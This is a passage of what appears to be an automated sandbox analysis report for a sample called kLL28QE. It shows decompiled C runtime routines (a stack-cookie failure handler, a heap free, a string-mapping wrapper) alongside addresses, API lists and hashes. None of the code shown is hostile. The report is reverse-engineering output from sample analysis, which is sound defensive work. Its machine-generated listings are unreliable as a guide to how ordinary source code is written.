                                                                                                                                                                                                      				 *0x423b8c = _t21;
                                                                                                                                                                                                      				 *0x423b88 = _t27;
                                                                                                                                                                                                      				 *0x423b84 = _t26;
                                                                                                                                                                                                      				 *0x423bb0 = ss;
                                                                                                                                                                                                      				 *0x423ba4 = cs;
                                                                                                                                                                                                      				 *0x423b80 = ds;
                                                                                                                                                                                                      				 *0x423b7c = es;
                                                                                                                                                                                                      				 *0x423b78 = fs;
                                                                                                                                                                                                      				 *0x423b74 = gs;
                                                                                                                                                                                                      				asm("pushfd");
                                                                                                                                                                                                      				_pop( *0x423ba8);
                                                                                                                                                                                                      				 *0x423b9c =  *_t31;
                                                                                                                                                                                                      				 *0x423ba0 = _v0;
                                                                                                                                                                                                      				 *0x423bac =  &_a4;
                                                                                                                                                                                                      				 *0x423ae8 = 0x10001;
                                                                                                                                                                                                      				_t11 =  *0x423ba0; // 0x0
                                                                                                                                                                                                      				 *0x423a9c = _t11;
                                                                                                                                                                                                      				 *0x423a90 = 0xc0000409;
                                                                                                                                                                                                      				 *0x423a94 = 1;
                                                                                                                                                                                                      				_t12 =  *0x422234; // 0x6dd51581
                                                                                                                                                                                                      				_v812 = _t12;
                                                                                                                                                                                                      				_t13 =  *0x422238; // 0x922aea7e
                                                                                                                                                                                                      				_v808 = _t13;
                                                                                                                                                                                                      				 *0x423ae0 = IsDebuggerPresent();
                                                                                                                                                                                                      				_push(1);
                                                                                                                                                                                                      				E004138FC(_t14);
                                                                                                                                                                                                      				SetUnhandledExceptionFilter(0);
                                                                                                                                                                                                      				_t17 = UnhandledExceptionFilter(0x41fb80);
                                                                                                                                                                                                      				if( *0x423ae0 == 0) {
                                                                                                                                                                                                      					_push(1);
                                                                                                                                                                                                      					E004138FC(_t17);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                                                                                                                      			}



















                                                                                                                                                                                                      0x0040ce09
                                                                                                                                                                                                      0x0040ce09
                                                                                                                                                                                                      0x0040ce09
                                                                                                                                                                                                      0x0040ce09
                                                                                                                                                                                                      0x0040ce09
                                                                                                                                                                                                      0x0040ce09
                                                                                                                                                                                                      0x0040ce09
                                                                                                                                                                                                      0x0040ce0f
                                                                                                                                                                                                      0x0040ce11
                                                                                                                                                                                                      0x0040ce11
                                                                                                                                                                                                      0x00413644
                                                                                                                                                                                                      0x00413649
                                                                                                                                                                                                      0x0041364f
                                                                                                                                                                                                      0x00413655
                                                                                                                                                                                                      0x0041365b
                                                                                                                                                                                                      0x00413661
                                                                                                                                                                                                      0x00413667
                                                                                                                                                                                                      0x0041366e
                                                                                                                                                                                                      0x00413675
                                                                                                                                                                                                      0x0041367c
                                                                                                                                                                                                      0x00413683
                                                                                                                                                                                                      0x0041368a
                                                                                                                                                                                                      0x00413691
                                                                                                                                                                                                      0x00413692
                                                                                                                                                                                                      0x0041369b
                                                                                                                                                                                                      0x004136a3
                                                                                                                                                                                                      0x004136ab
                                                                                                                                                                                                      0x004136b6
                                                                                                                                                                                                      0x004136c0
                                                                                                                                                                                                      0x004136c5
                                                                                                                                                                                                      0x004136ca
                                                                                                                                                                                                      0x004136d4
                                                                                                                                                                                                      0x004136de
                                                                                                                                                                                                      0x004136e3
                                                                                                                                                                                                      0x004136e9
                                                                                                                                                                                                      0x004136ee
                                                                                                                                                                                                      0x004136fa
                                                                                                                                                                                                      0x004136ff
                                                                                                                                                                                                      0x00413701
                                                                                                                                                                                                      0x00413709
                                                                                                                                                                                                      0x00413714
                                                                                                                                                                                                      0x00413721
                                                                                                                                                                                                      0x00413723
                                                                                                                                                                                                      0x00413725
                                                                                                                                                                                                      0x0041372a
                                                                                                                                                                                                      0x0041373e

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • IsDebuggerPresent.KERNEL32 ref: 004136F4
                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413709
                                                                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 00413714
                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 00413730
                                                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000), ref: 00413737
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.408060927.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.408060927.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000006.00000002.408060927.000000000044D000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_kLL28QE.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2579439406-0
                                                                                                                                                                                                      • Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                                                                                                                                      • Instruction ID: 93bf0ba95bc2a0faef8203f21c221f33afe887fd41373e09ae0fa508b254143b
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A521C3B4601204EFD720DF65E94A6457FB4FB08356F80407AE50887772E7B86682CF4D
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E0040ADB0(intOrPtr* __ecx) {
                                                                                                                                                                                                      				void* _t5;
                                                                                                                                                                                                      				intOrPtr* _t11;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t11 = __ecx;
                                                                                                                                                                                                      				_t5 =  *(__ecx + 8);
                                                                                                                                                                                                      				 *__ecx = 0x41eff0;
                                                                                                                                                                                                      				if(_t5 != 0) {
                                                                                                                                                                                                      					_t5 =  *((intOrPtr*)( *((intOrPtr*)( *_t5 + 8))))(_t5);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if( *(_t11 + 0xc) != 0) {
                                                                                                                                                                                                      					_t5 = GetProcessHeap();
                                                                                                                                                                                                      					if(_t5 != 0) {
                                                                                                                                                                                                      						return HeapFree(_t5, 0,  *(_t11 + 0xc));
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return _t5;
                                                                                                                                                                                                      			}





                                                                                                                                                                                                      0x0040adb3
                                                                                                                                                                                                      0x0040adb5
                                                                                                                                                                                                      0x0040adb8
                                                                                                                                                                                                      0x0040adc0
                                                                                                                                                                                                      0x0040adc8
                                                                                                                                                                                                      0x0040adc8
                                                                                                                                                                                                      0x0040adce
                                                                                                                                                                                                      0x0040add0
                                                                                                                                                                                                      0x0040add8
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0040ade1
                                                                                                                                                                                                      0x0040add8
                                                                                                                                                                                                      0x0040ade8

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 0040ADD0
                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040ADE1
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.408060927.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.408060927.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000006.00000002.408060927.000000000044D000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_kLL28QE.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Heap$FreeProcess
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3859560861-0
                                                                                                                                                                                                      • Opcode ID: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                                                                                                                                                                      • Instruction ID: 72dd180cd7110ee49b406fd12918c6a771032a3efea8c67e715e4993f3fed615
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 54E09A312003009FC320AB61DC08FA337AAEF88311F04C829E55A936A0DB78EC42CB58
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.409089171.0000000002F47000.00000040.00000020.00020000.00000000.sdmp, Offset: 02F47000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_2f47000_kLL28QE.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                                                                      • Instruction ID: 681098410f28b3434b440a8960992e133ddb4d76d2a74d1f4d64a87a098f405f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A0118272340100AFD744DF59DC80EA6B7EAEB89364B298096EE04CB321DBB5ED42C760
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 86%
                                                                                                                                                                                                      			E00417081(short* __ecx, int _a4, signed int _a8, char* _a12, int _a16, char* _a20, int _a24, int _a28, intOrPtr _a32) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				int _v12;
                                                                                                                                                                                                      				int _v16;
                                                                                                                                                                                                      				int _v20;
                                                                                                                                                                                                      				intOrPtr _v24;
                                                                                                                                                                                                      				void* _v36;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				void* __ebp;
                                                                                                                                                                                                      				signed int _t110;
                                                                                                                                                                                                      				intOrPtr _t112;
                                                                                                                                                                                                      				intOrPtr _t113;
                                                                                                                                                                                                      				short* _t115;
                                                                                                                                                                                                      				short* _t116;
                                                                                                                                                                                                      				char* _t120;
                                                                                                                                                                                                      				short* _t121;
                                                                                                                                                                                                      				short* _t123;
                                                                                                                                                                                                      				short* _t127;
                                                                                                                                                                                                      				int _t128;
                                                                                                                                                                                                      				short* _t141;
                                                                                                                                                                                                      				signed int _t144;
                                                                                                                                                                                                      				void* _t146;
                                                                                                                                                                                                      				short* _t147;
                                                                                                                                                                                                      				signed int _t150;
                                                                                                                                                                                                      				short* _t153;
                                                                                                                                                                                                      				char* _t157;
                                                                                                                                                                                                      				int _t160;
                                                                                                                                                                                                      				long _t162;
                                                                                                                                                                                                      				signed int _t174;
                                                                                                                                                                                                      				signed int _t178;
                                                                                                                                                                                                      				signed int _t179;
                                                                                                                                                                                                      				int _t182;
                                                                                                                                                                                                      				short* _t184;
                                                                                                                                                                                                      				signed int _t186;
                                                                                                                                                                                                      				signed int _t188;
                                                                                                                                                                                                      				short* _t189;
                                                                                                                                                                                                      				int _t191;
                                                                                                                                                                                                      				intOrPtr _t194;
                                                                                                                                                                                                      				int _t207;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t110 =  *0x422234; // 0x6dd51581
                                                                                                                                                                                                      				_v8 = _t110 ^ _t188;
                                                                                                                                                                                                      				_t184 = __ecx;
                                                                                                                                                                                                      				_t194 =  *0x423e7c; // 0x1
                                                                                                                                                                                                      				if(_t194 == 0) {
                                                                                                                                                                                                      					_t182 = 1;
                                                                                                                                                                                                      					if(LCMapStringW(0, 0x100, 0x420398, 1, 0, 0) == 0) {
                                                                                                                                                                                                      						_t162 = GetLastError();
                                                                                                                                                                                                      						__eflags = _t162 - 0x78;
                                                                                                                                                                                                      						if(_t162 == 0x78) {
                                                                                                                                                                                                      							 *0x423e7c = 2;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						 *0x423e7c = 1;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(_a16 <= 0) {
                                                                                                                                                                                                      					L13:
                                                                                                                                                                                                      					_t112 =  *0x423e7c; // 0x1
                                                                                                                                                                                                      					if(_t112 == 2 || _t112 == 0) {
                                                                                                                                                                                                      						_v16 = 0;
                                                                                                                                                                                                      						_v20 = 0;
                                                                                                                                                                                                      						__eflags = _a4;
                                                                                                                                                                                                      						if(_a4 == 0) {
                                                                                                                                                                                                      							_a4 =  *((intOrPtr*)( *_t184 + 0x14));
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						__eflags = _a28;
                                                                                                                                                                                                      						if(_a28 == 0) {
                                                                                                                                                                                                      							_a28 =  *((intOrPtr*)( *_t184 + 4));
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t113 = E00417A20(0, _t179, _t182, _t184, _a4);
                                                                                                                                                                                                      						_v24 = _t113;
                                                                                                                                                                                                      						__eflags = _t113 - 0xffffffff;
                                                                                                                                                                                                      						if(_t113 != 0xffffffff) {
                                                                                                                                                                                                      							__eflags = _t113 - _a28;
                                                                                                                                                                                                      							if(_t113 == _a28) {
                                                                                                                                                                                                      								_t184 = LCMapStringA(_a4, _a8, _a12, _a16, _a20, _a24);
                                                                                                                                                                                                      								L78:
                                                                                                                                                                                                      								__eflags = _v16;
                                                                                                                                                                                                      								if(__eflags != 0) {
                                                                                                                                                                                                      									_push(_v16);
                                                                                                                                                                                                      									E0040B6B5(0, _t182, _t184, __eflags);
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								_t115 = _v20;
                                                                                                                                                                                                      								__eflags = _t115;
                                                                                                                                                                                                      								if(_t115 != 0) {
                                                                                                                                                                                                      									__eflags = _a20 - _t115;
                                                                                                                                                                                                      									if(__eflags != 0) {
                                                                                                                                                                                                      										_push(_t115);
                                                                                                                                                                                                      										E0040B6B5(0, _t182, _t184, __eflags);
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								_t116 = _t184;
                                                                                                                                                                                                      								goto L84;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t120 = E00417A69(_t179, _a28, _t113, _a12,  &_a16, 0, 0);
                                                                                                                                                                                                      							_t191 =  &(_t189[0xc]);
                                                                                                                                                                                                      							_v16 = _t120;
                                                                                                                                                                                                      							__eflags = _t120;
                                                                                                                                                                                                      							if(_t120 == 0) {
                                                                                                                                                                                                      								goto L58;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t121 = LCMapStringA(_a4, _a8, _t120, _a16, 0, 0);
                                                                                                                                                                                                      							_v12 = _t121;
                                                                                                                                                                                                      							__eflags = _t121;
                                                                                                                                                                                                      							if(__eflags != 0) {
                                                                                                                                                                                                      								if(__eflags <= 0) {
                                                                                                                                                                                                      									L71:
                                                                                                                                                                                                      									_t182 = 0;
                                                                                                                                                                                                      									__eflags = 0;
                                                                                                                                                                                                      									L72:
                                                                                                                                                                                                      									__eflags = _t182;
                                                                                                                                                                                                      									if(_t182 == 0) {
                                                                                                                                                                                                      										goto L62;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									E0040BA30(_t182, _t182, 0, _v12);
                                                                                                                                                                                                      									_t123 = LCMapStringA(_a4, _a8, _v16, _a16, _t182, _v12);
                                                                                                                                                                                                      									_v12 = _t123;
                                                                                                                                                                                                      									__eflags = _t123;
                                                                                                                                                                                                      									if(_t123 != 0) {
                                                                                                                                                                                                      										_t186 = E00417A69(_t179, _v24, _a28, _t182,  &_v12, _a20, _a24);
                                                                                                                                                                                                      										_v20 = _t186;
                                                                                                                                                                                                      										asm("sbb esi, esi");
                                                                                                                                                                                                      										_t184 =  ~_t186 & _v12;
                                                                                                                                                                                                      										__eflags = _t184;
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										_t184 = 0;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									E004147AE(_t182);
                                                                                                                                                                                                      									goto L78;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								__eflags = _t121 - 0xffffffe0;
                                                                                                                                                                                                      								if(_t121 > 0xffffffe0) {
                                                                                                                                                                                                      									goto L71;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								_t127 =  &(_t121[4]);
                                                                                                                                                                                                      								__eflags = _t127 - 0x400;
                                                                                                                                                                                                      								if(_t127 > 0x400) {
                                                                                                                                                                                                      									_t128 = E0040B84D(0, _t179, _t182, _t127);
                                                                                                                                                                                                      									__eflags = _t128;
                                                                                                                                                                                                      									if(_t128 != 0) {
                                                                                                                                                                                                      										 *_t128 = 0xdddd;
                                                                                                                                                                                                      										_t128 = _t128 + 8;
                                                                                                                                                                                                      										__eflags = _t128;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									_t182 = _t128;
                                                                                                                                                                                                      									goto L72;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								E0040CFB0(_t127);
                                                                                                                                                                                                      								_t182 = _t191;
                                                                                                                                                                                                      								__eflags = _t182;
                                                                                                                                                                                                      								if(_t182 == 0) {
                                                                                                                                                                                                      									goto L62;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								 *_t182 = 0xcccc;
                                                                                                                                                                                                      								_t182 = _t182 + 8;
                                                                                                                                                                                                      								goto L72;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							L62:
                                                                                                                                                                                                      							_t184 = 0;
                                                                                                                                                                                                      							goto L78;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							goto L58;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						if(_t112 != 1) {
                                                                                                                                                                                                      							L58:
                                                                                                                                                                                                      							_t116 = 0;
                                                                                                                                                                                                      							L84:
                                                                                                                                                                                                      							return E0040CE09(_t116, 0, _v8 ^ _t188, _t179, _t182, _t184);
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_v12 = 0;
                                                                                                                                                                                                      						if(_a28 == 0) {
                                                                                                                                                                                                      							_a28 =  *((intOrPtr*)( *_t184 + 4));
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t184 = MultiByteToWideChar;
                                                                                                                                                                                                      						_t182 = MultiByteToWideChar(_a28, 1 + (0 | _a32 != 0x00000000) * 8, _a12, _a16, 0, 0);
                                                                                                                                                                                                      						_t207 = _t182;
                                                                                                                                                                                                      						if(_t207 == 0) {
                                                                                                                                                                                                      							goto L58;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							if(_t207 <= 0) {
                                                                                                                                                                                                      								L28:
                                                                                                                                                                                                      								_v16 = 0;
                                                                                                                                                                                                      								L29:
                                                                                                                                                                                                      								if(_v16 == 0) {
                                                                                                                                                                                                      									goto L58;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								if(MultiByteToWideChar(_a28, 1, _a12, _a16, _v16, _t182) == 0) {
                                                                                                                                                                                                      									L52:
                                                                                                                                                                                                      									E004147AE(_v16);
                                                                                                                                                                                                      									_t116 = _v12;
                                                                                                                                                                                                      									goto L84;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								_t184 = LCMapStringW;
                                                                                                                                                                                                      								_t174 = LCMapStringW(_a4, _a8, _v16, _t182, 0, 0);
                                                                                                                                                                                                      								_v12 = _t174;
                                                                                                                                                                                                      								if(_t174 == 0) {
                                                                                                                                                                                                      									goto L52;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								if((_a8 & 0x00000400) == 0) {
                                                                                                                                                                                                      									__eflags = _t174;
                                                                                                                                                                                                      									if(_t174 <= 0) {
                                                                                                                                                                                                      										L44:
                                                                                                                                                                                                      										_t184 = 0;
                                                                                                                                                                                                      										__eflags = 0;
                                                                                                                                                                                                      										L45:
                                                                                                                                                                                                      										__eflags = _t184;
                                                                                                                                                                                                      										if(_t184 != 0) {
                                                                                                                                                                                                      											_t141 = LCMapStringW(_a4, _a8, _v16, _t182, _t184, _v12);
                                                                                                                                                                                                      											__eflags = _t141;
                                                                                                                                                                                                      											if(_t141 != 0) {
                                                                                                                                                                                                      												_push(0);
                                                                                                                                                                                                      												_push(0);
                                                                                                                                                                                                      												__eflags = _a24;
                                                                                                                                                                                                      												if(_a24 != 0) {
                                                                                                                                                                                                      													_push(_a24);
                                                                                                                                                                                                      													_push(_a20);
                                                                                                                                                                                                      												} else {
                                                                                                                                                                                                      													_push(0);
                                                                                                                                                                                                      													_push(0);
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      												_v12 = WideCharToMultiByte(_a28, 0, _t184, _v12, ??, ??, ??, ??);
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      											E004147AE(_t184);
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										goto L52;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									_t144 = 0xffffffe0;
                                                                                                                                                                                                      									_t179 = _t144 % _t174;
                                                                                                                                                                                                      									__eflags = _t144 / _t174 - 2;
                                                                                                                                                                                                      									if(_t144 / _t174 < 2) {
                                                                                                                                                                                                      										goto L44;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									_t52 = _t174 + 8; // 0x8
                                                                                                                                                                                                      									_t146 = _t174 + _t52;
                                                                                                                                                                                                      									__eflags = _t146 - 0x400;
                                                                                                                                                                                                      									if(_t146 > 0x400) {
                                                                                                                                                                                                      										_t147 = E0040B84D(0, _t179, _t182, _t146);
                                                                                                                                                                                                      										__eflags = _t147;
                                                                                                                                                                                                      										if(_t147 != 0) {
                                                                                                                                                                                                      											 *_t147 = 0xdddd;
                                                                                                                                                                                                      											_t147 =  &(_t147[4]);
                                                                                                                                                                                                      											__eflags = _t147;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										_t184 = _t147;
                                                                                                                                                                                                      										goto L45;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									E0040CFB0(_t146);
                                                                                                                                                                                                      									_t184 = _t189;
                                                                                                                                                                                                      									__eflags = _t184;
                                                                                                                                                                                                      									if(_t184 == 0) {
                                                                                                                                                                                                      										goto L52;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									 *_t184 = 0xcccc;
                                                                                                                                                                                                      									_t184 =  &(_t184[4]);
                                                                                                                                                                                                      									goto L45;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								if(_a24 != 0 && _t174 <= _a24) {
                                                                                                                                                                                                      									LCMapStringW(_a4, _a8, _v16, _t182, _a20, _a24);
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								goto L52;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t150 = 0xffffffe0;
                                                                                                                                                                                                      							_t179 = _t150 % _t182;
                                                                                                                                                                                                      							if(_t150 / _t182 < 2) {
                                                                                                                                                                                                      								goto L28;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t25 = _t182 + 8; // 0x8
                                                                                                                                                                                                      							_t152 = _t182 + _t25;
                                                                                                                                                                                                      							if(_t182 + _t25 > 0x400) {
                                                                                                                                                                                                      								_t153 = E0040B84D(0, _t179, _t182, _t152);
                                                                                                                                                                                                      								__eflags = _t153;
                                                                                                                                                                                                      								if(_t153 == 0) {
                                                                                                                                                                                                      									L27:
                                                                                                                                                                                                      									_v16 = _t153;
                                                                                                                                                                                                      									goto L29;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								 *_t153 = 0xdddd;
                                                                                                                                                                                                      								L26:
                                                                                                                                                                                                      								_t153 =  &(_t153[4]);
                                                                                                                                                                                                      								goto L27;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							E0040CFB0(_t152);
                                                                                                                                                                                                      							_t153 = _t189;
                                                                                                                                                                                                      							if(_t153 == 0) {
                                                                                                                                                                                                      								goto L27;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							 *_t153 = 0xcccc;
                                                                                                                                                                                                      							goto L26;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t178 = _a16;
                                                                                                                                                                                                      				_t157 = _a12;
                                                                                                                                                                                                      				while(1) {
                                                                                                                                                                                                      					_t178 = _t178 - 1;
                                                                                                                                                                                                      					if( *_t157 == 0) {
                                                                                                                                                                                                      						break;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t157 =  &(_t157[1]);
                                                                                                                                                                                                      					if(_t178 != 0) {
                                                                                                                                                                                                      						continue;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t178 = _t178 | 0xffffffff;
                                                                                                                                                                                                      					break;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t160 = _a16 - _t178 - 1;
                                                                                                                                                                                                      				if(_t160 < _a16) {
                                                                                                                                                                                                      					_t160 = _t160 + 1;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_a16 = _t160;
                                                                                                                                                                                                      				goto L13;
                                                                                                                                                                                                      			}











































                                                                                                                                                                                                      0x00417089
                                                                                                                                                                                                      0x00417090
                                                                                                                                                                                                      0x00417098
                                                                                                                                                                                                      0x0041709a
                                                                                                                                                                                                      0x004170a0
                                                                                                                                                                                                      0x004170a6
                                                                                                                                                                                                      0x004170bb
                                                                                                                                                                                                      0x004170c5
                                                                                                                                                                                                      0x004170cb
                                                                                                                                                                                                      0x004170ce
                                                                                                                                                                                                      0x004170d0
                                                                                                                                                                                                      0x004170d0
                                                                                                                                                                                                      0x004170bd
                                                                                                                                                                                                      0x004170bd
                                                                                                                                                                                                      0x004170bd
                                                                                                                                                                                                      0x004170bb
                                                                                                                                                                                                      0x004170dd
                                                                                                                                                                                                      0x00417101
                                                                                                                                                                                                      0x00417101
                                                                                                                                                                                                      0x00417109
                                                                                                                                                                                                      0x004172bb
                                                                                                                                                                                                      0x004172be
                                                                                                                                                                                                      0x004172c1
                                                                                                                                                                                                      0x004172c4
                                                                                                                                                                                                      0x004172cb
                                                                                                                                                                                                      0x004172cb
                                                                                                                                                                                                      0x004172ce
                                                                                                                                                                                                      0x004172d1
                                                                                                                                                                                                      0x004172d8
                                                                                                                                                                                                      0x004172d8
                                                                                                                                                                                                      0x004172de
                                                                                                                                                                                                      0x004172e4
                                                                                                                                                                                                      0x004172e7
                                                                                                                                                                                                      0x004172ea
                                                                                                                                                                                                      0x004172f3
                                                                                                                                                                                                      0x004172f6
                                                                                                                                                                                                      0x004173ef
                                                                                                                                                                                                      0x004173f1
                                                                                                                                                                                                      0x004173f1
                                                                                                                                                                                                      0x004173f4
                                                                                                                                                                                                      0x004173f6
                                                                                                                                                                                                      0x004173f9
                                                                                                                                                                                                      0x004173fe
                                                                                                                                                                                                      0x004173ff
                                                                                                                                                                                                      0x00417402
                                                                                                                                                                                                      0x00417404
                                                                                                                                                                                                      0x00417406
                                                                                                                                                                                                      0x00417409
                                                                                                                                                                                                      0x0041740b
                                                                                                                                                                                                      0x0041740c
                                                                                                                                                                                                      0x00417411
                                                                                                                                                                                                      0x00417409
                                                                                                                                                                                                      0x00417412
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00417412
                                                                                                                                                                                                      0x00417309
                                                                                                                                                                                                      0x0041730e
                                                                                                                                                                                                      0x00417311
                                                                                                                                                                                                      0x00417314
                                                                                                                                                                                                      0x00417316
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0041732a
                                                                                                                                                                                                      0x0041732c
                                                                                                                                                                                                      0x0041732f
                                                                                                                                                                                                      0x00417331
                                                                                                                                                                                                      0x0041733a
                                                                                                                                                                                                      0x00417379
                                                                                                                                                                                                      0x00417379
                                                                                                                                                                                                      0x00417379
                                                                                                                                                                                                      0x0041737b
                                                                                                                                                                                                      0x0041737b
                                                                                                                                                                                                      0x0041737d
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00417384
                                                                                                                                                                                                      0x0041739c
                                                                                                                                                                                                      0x0041739e
                                                                                                                                                                                                      0x004173a1
                                                                                                                                                                                                      0x004173a3
                                                                                                                                                                                                      0x004173bf
                                                                                                                                                                                                      0x004173c1
                                                                                                                                                                                                      0x004173c9
                                                                                                                                                                                                      0x004173cb
                                                                                                                                                                                                      0x004173cb
                                                                                                                                                                                                      0x004173a5
                                                                                                                                                                                                      0x004173a5
                                                                                                                                                                                                      0x004173a5
                                                                                                                                                                                                      0x004173cf
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x004173d4
                                                                                                                                                                                                      0x0041733c
                                                                                                                                                                                                      0x0041733f
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00417341
                                                                                                                                                                                                      0x00417344
                                                                                                                                                                                                      0x00417349
                                                                                                                                                                                                      0x00417362
                                                                                                                                                                                                      0x00417368
                                                                                                                                                                                                      0x0041736a
                                                                                                                                                                                                      0x0041736c
                                                                                                                                                                                                      0x00417372
